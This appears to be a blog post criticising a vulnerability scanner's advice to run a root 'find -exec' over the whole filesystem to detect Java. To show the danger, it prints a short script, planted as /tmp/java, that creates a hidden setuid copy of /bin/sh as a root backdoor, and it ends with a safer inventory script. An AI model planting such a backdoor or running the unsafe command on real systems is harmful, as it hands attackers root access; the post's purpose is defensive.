One of my long-term clients is a DoD software development program. In recent years DoD has been taking computer security, aka “information assurance”, fairly seriously. Software updates, system configurations, and vulnerability scanning are mandated with ever-increasing specificity and urgency.
All well and good, and the general trend has definitely been for the better overall. But, whenever a big bureaucracy is involved you can be sure to find some counterproductive forces.
A recent case in point: at my client site frequent vulnerability scanning with specific products is mandated. The reports generated by this product often include very detailed, prescriptive “mitigations”. The instructions for a Java-related vulnerability on Linux/Unix included this (paraphrased) gem:
As root, execute the following commands on these systems to determine if any
vulnerable versions of java are present:
find / -name java -exec {} -v {} \;
Wow. I wonder how many sysadmins will actually run that command on their systems. The find walks the entire filesystem, including /tmp, home directories and every other location an unprivileged user can write to, and -exec runs each file named java it encounters, as root, with no check on who put it there. If you don’t immediately see the clear and present danger in this instruction, consider the following shell script, named java and located in, say, the /tmp/ directory:
#!/bin/sh
cp /bin/sh /usr/lib/security/.x
chmod u+s /usr/lib/security/.x
Bingo, an instant root privilege backdoor for anyone with any shell access to that system.
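The inventory the scanner wanted can be done without running whatever find turns up. The script below is an added example, not from the original post or the scanner vendor: it assumes GNU stat and only invokes a candidate with -version when the file and every directory between it and the trusted prefix (e.g. /usr or /opt) are owned by root and not writable by group or others; anything else is listed for manual review but never executed.

```shell
#!/bin/sh
# Added example, not from the original post: inventory Java binaries without
# executing whatever "find" happens to turn up. A candidate is only invoked
# with -version when every path component below the trusted prefix is owned
# by TRUSTED_UID (root by default) and is not writable by group or others,
# so a file an unprivileged user planted in /tmp, a home directory or a
# world-writable subtree is listed but never run.
TRUSTED_UID="${TRUSTED_UID:-0}"

# path_is_trusted FILE PREFIX: return 0 when FILE and each directory between
# it and PREFIX (inclusive) are owned by TRUSTED_UID and carry no group/other
# write bit. GNU stat (-c) is assumed.
path_is_trusted() {
    p="$1"; prefix="$2"
    while :; do
        info=$(stat -c '%u %a' "$p" 2>/dev/null) || return 1
        owner=${info%% *}
        mode=$(printf '%d' "0${info##* }")    # octal mode string -> decimal
        [ "$owner" = "$TRUSTED_UID" ] || return 1
        [ $((mode & 18)) -eq 0 ] || return 1  # 18 = 022: g+w or o+w is set
        [ "$p" = "$prefix" ] && return 0
        [ "$p" = "/" ] && return 1            # walked past PREFIX: not under it
        p=$(dirname "$p")
    done
}

# java_inventory PREFIX...: for each file named "java" under the given
# prefixes, print "RUN <path>: <first -version line>" when trusted, otherwise
# "SKIPPED <path>" so an administrator can inspect it by hand.
java_inventory() {
    for prefix in "$@"; do
        find "$prefix" -type f -name java 2>/dev/null | while IFS= read -r f; do
            if [ -x "$f" ] && path_is_trusted "$f" "$prefix"; then
                # real java prints its version on stderr, hence 2>&1
                printf 'RUN %s: %s\n' "$f" "$("$f" -version 2>&1 | head -n 1)"
            else
                printf 'SKIPPED %s\n' "$f"
            fi
        done
    done
}

if [ $# -gt 0 ]; then java_inventory "$@"; fi   # e.g. ./inventory.sh /usr /opt
```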